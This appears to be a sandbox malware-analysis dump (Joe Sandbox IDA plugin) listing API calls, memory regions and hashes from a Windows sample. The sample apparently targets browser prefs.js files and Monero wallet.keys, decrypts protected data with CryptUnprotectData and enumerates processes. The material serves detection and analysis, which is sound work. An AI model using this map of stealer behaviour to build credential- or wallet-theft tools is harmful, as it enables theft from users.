                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C5510C,?,?,?,00C551B4,?,?,00000000,?,00000000), ref: 00C31923
                                    • StrCmpCA.SHLWAPI(?,00C5525C), ref: 00C31973
                                    • StrCmpCA.SHLWAPI(?,00C55304), ref: 00C31989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C31D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C31DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C31E20
                                    • FindClose.KERNEL32(000000FF), ref: 00C31E32
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C50C2E), ref: 00C3DE5E
                                    • StrCmpCA.SHLWAPI(?,00C514C8), ref: 00C3DEAE
                                    • StrCmpCA.SHLWAPI(?,00C514CC), ref: 00C3DEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3E3E0
                                    • FindClose.KERNEL32(000000FF), ref: 00C3E3F2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: %;U$>Qm$@T[?$Qhw2$Qhw2$iq$q-w$*xk$89?$twf
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C514B0,00C50C2A), ref: 00C3DAEB
                                    • StrCmpCA.SHLWAPI(?,00C514B4), ref: 00C3DB33
                                    • StrCmpCA.SHLWAPI(?,00C514B8), ref: 00C3DB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3DDCC
                                    • FindClose.KERNEL32(000000FF), ref: 00C3DDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: .N$3ee[$5 ^$>v{u$U*&B$U!M$0;7$G[~
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00C505AF), ref: 00C47BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C47BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C47C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C47C62
                                    • LocalFree.KERNEL32(00000000), ref: 00C47D22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: a9b35d9a094cafaebf4e8f2da11b78130fca7a90a13bc09dd1d68155f5ac659d
                                    • Instruction ID: a84943b41c37cd29da9ad5e61304c637b8bfae034f35d0997914ab652976b337
                                    • Opcode Fuzzy Hash: a9b35d9a094cafaebf4e8f2da11b78130fca7a90a13bc09dd1d68155f5ac659d
                                    • Instruction Fuzzy Hash: 42415C71950218ABDB24DF95DC99BEEB778FF44700F204299E50AA2181DB342F89CFA1
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C50D73), ref: 00C3E4A2
                                    • StrCmpCA.SHLWAPI(?,00C514F8), ref: 00C3E4F2
                                    • StrCmpCA.SHLWAPI(?,00C514FC), ref: 00C3E508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3EBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: d84e3eb952e26aae74e8874422d22aee6c1209320a88762b95a8648d4149bb90
                                    • Instruction ID: c11abe0bff9ed55c2db3fd304ec223208bc92731c7e4f501e312f6b61ff20690
                                    • Opcode Fuzzy Hash: d84e3eb952e26aae74e8874422d22aee6c1209320a88762b95a8648d4149bb90
                                    • Instruction Fuzzy Hash: 06122172950118ABEB14FB60DC96EED7378BF54300F4145A9B90AA60D1EF306F89DF92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #1]7$/Mqy$Fp[g$OAn$]_$k-q
                                    • API String ID: 0-1761499864
                                    • Opcode ID: ffe81614f9d12f9968c9f3ab64ccb95c5fd00ec504fc69526907b6d7cd9e7908
                                    • Instruction ID: b8ec23924fe1371369ae41aa8d06da1fe86091fb91f91666e9f8690632925262
                                    • Opcode Fuzzy Hash: ffe81614f9d12f9968c9f3ab64ccb95c5fd00ec504fc69526907b6d7cd9e7908
                                    • Instruction Fuzzy Hash: A1B24AF3A0C214AFE3046E2DEC8567ABBE9EF94760F1A453DE6C4C7344EA3558008796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Q?$dq!.$fWq$m^W${i?~$z[3
                                    • API String ID: 0-630982637
                                    • Opcode ID: 1c20221849eba711fc8666ead54a6ce755f0aa21784db733563e5275aca2a7d2
                                    • Instruction ID: bd56bac2c819ed1158a1a718e882bd4d7151a70d852e997a6da4b5b6997c0cd3
                                    • Opcode Fuzzy Hash: 1c20221849eba711fc8666ead54a6ce755f0aa21784db733563e5275aca2a7d2
                                    • Instruction Fuzzy Hash: C3B219F3A0C2049FE3046E2DEC8567BBBE9EF94720F16463DEAC5C3744EA3558058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: '5}M$6Bd|$@cSx$`\7$qV~$q^|
                                    • API String ID: 0-287118796
                                    • Opcode ID: d8f906e6819b7b21ec2f10a599b8566c1c04f45f489832aac962f283af46a678
                                    • Instruction ID: 0e9205b96cbbb5b5cd1b973e4a710525c182de2b6c662fcc52b62f288fb4e75a
                                    • Opcode Fuzzy Hash: d8f906e6819b7b21ec2f10a599b8566c1c04f45f489832aac962f283af46a678
                                    • Instruction Fuzzy Hash: 7FB2F5F3A0C2009FE3046E29EC8577AFBE9EF94720F1A492DE6C487744EA3558058797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: EV?s$H(oO$UTw?$Xwo$[L+?$o"w
                                    • API String ID: 0-1360323756
                                    • Opcode ID: 9160b8ef0602a3871eceafb31a41df1c96dcec33a6f19925814d5a2cbb1a25c0
                                    • Instruction ID: e8b02b9e5326f3015e6f58f8c28899292900f2b07ea8af627bc4a077c85f84e0
                                    • Opcode Fuzzy Hash: 9160b8ef0602a3871eceafb31a41df1c96dcec33a6f19925814d5a2cbb1a25c0
                                    • Instruction Fuzzy Hash: C0B2F4F350C3049FE304AE2DEC8567AFBE5EF94320F1A4A2DEAD487744EA3558418697
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C3C871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C3C87C
                                    • lstrcat.KERNEL32(?,00C50B46), ref: 00C3C943
                                    • lstrcat.KERNEL32(?,00C50B47), ref: 00C3C957
                                    • lstrcat.KERNEL32(?,00C50B4E), ref: 00C3C978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: d6bf788de7e549534f98a6226b72e7befc931355b3958aacf44485eee94cc652
                                    • Instruction ID: 54a5ce13cac743437e3a9a320c32a8cf1d985954cbaa5238e13eb55bc72d6612
                                    • Opcode Fuzzy Hash: d6bf788de7e549534f98a6226b72e7befc931355b3958aacf44485eee94cc652
                                    • Instruction Fuzzy Hash: 62416EB590420ADFDB10DFA0DD89BFEB7B8BB84304F1441B8E509B6280D7745A88CF92
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C3724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C37254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C37281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C372A4
                                    • LocalFree.KERNEL32(?), ref: 00C372AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: d3cf2e5419f88daeb6a46e5f4f63505669ec6188253551036aa849663bac4870
                                    • Instruction ID: 78bf64b4386e4890d85681ebd13a1b0fd44b6b079a9a40f6d0d85c1f47fdd8f4
                                    • Opcode Fuzzy Hash: d3cf2e5419f88daeb6a46e5f4f63505669ec6188253551036aa849663bac4870
                                    • Instruction Fuzzy Hash: C20140B5A40208BFEB14DBD4DD4AF9E7778AB44700F144154FB09BA2C0D670AA448B66
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C4961E
                                    • Process32First.KERNEL32(00C50ACA,00000128), ref: 00C49632
                                    • Process32Next.KERNEL32(00C50ACA,00000128), ref: 00C49647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00C4965C
                                    • CloseHandle.KERNEL32(00C50ACA), ref: 00C4967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 138af7f0259d7b807b0c172ae6034491190b03ae30a507a60d3698ef83280a1f
                                    • Instruction ID: 0a03d126868c0abf6a5924f4a7feef271f0d74d1add40938adf6b6ff81020a65
                                    • Opcode Fuzzy Hash: 138af7f0259d7b807b0c172ae6034491190b03ae30a507a60d3698ef83280a1f
                                    • Instruction Fuzzy Hash: 36010C75A00218AFDB64DFA6DD48BEEB7F8FB48301F144199B909A6240D7749B84CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                     • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ma}^$sq|$<&{$o
                                    • API String ID: 0-3559195441
                                    • Opcode ID: f4c66c950c0cde68bea905bf0e7e79361198515afafd80281be29bd2917c33fe
                                    • Instruction ID: f6134ce39673a8ebeaecc26a367fc462f76792a9a08be3e045e7028dc2cdbb51
                                    • Opcode Fuzzy Hash: f4c66c950c0cde68bea905bf0e7e79361198515afafd80281be29bd2917c33fe
                                    • Instruction Fuzzy Hash: 62B218F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3558058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                     • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
